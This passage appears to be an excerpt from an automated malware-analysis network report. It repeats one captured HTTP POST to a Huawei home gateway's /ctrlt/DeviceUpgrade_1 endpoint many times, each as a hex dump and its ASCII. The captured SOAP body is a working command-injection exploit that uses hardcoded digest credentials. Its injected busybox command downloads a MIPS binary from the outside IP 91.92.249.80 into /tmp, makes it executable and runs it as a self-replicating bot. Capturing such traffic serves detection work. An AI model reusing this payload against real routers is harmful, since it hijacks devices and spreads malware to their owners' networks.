55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
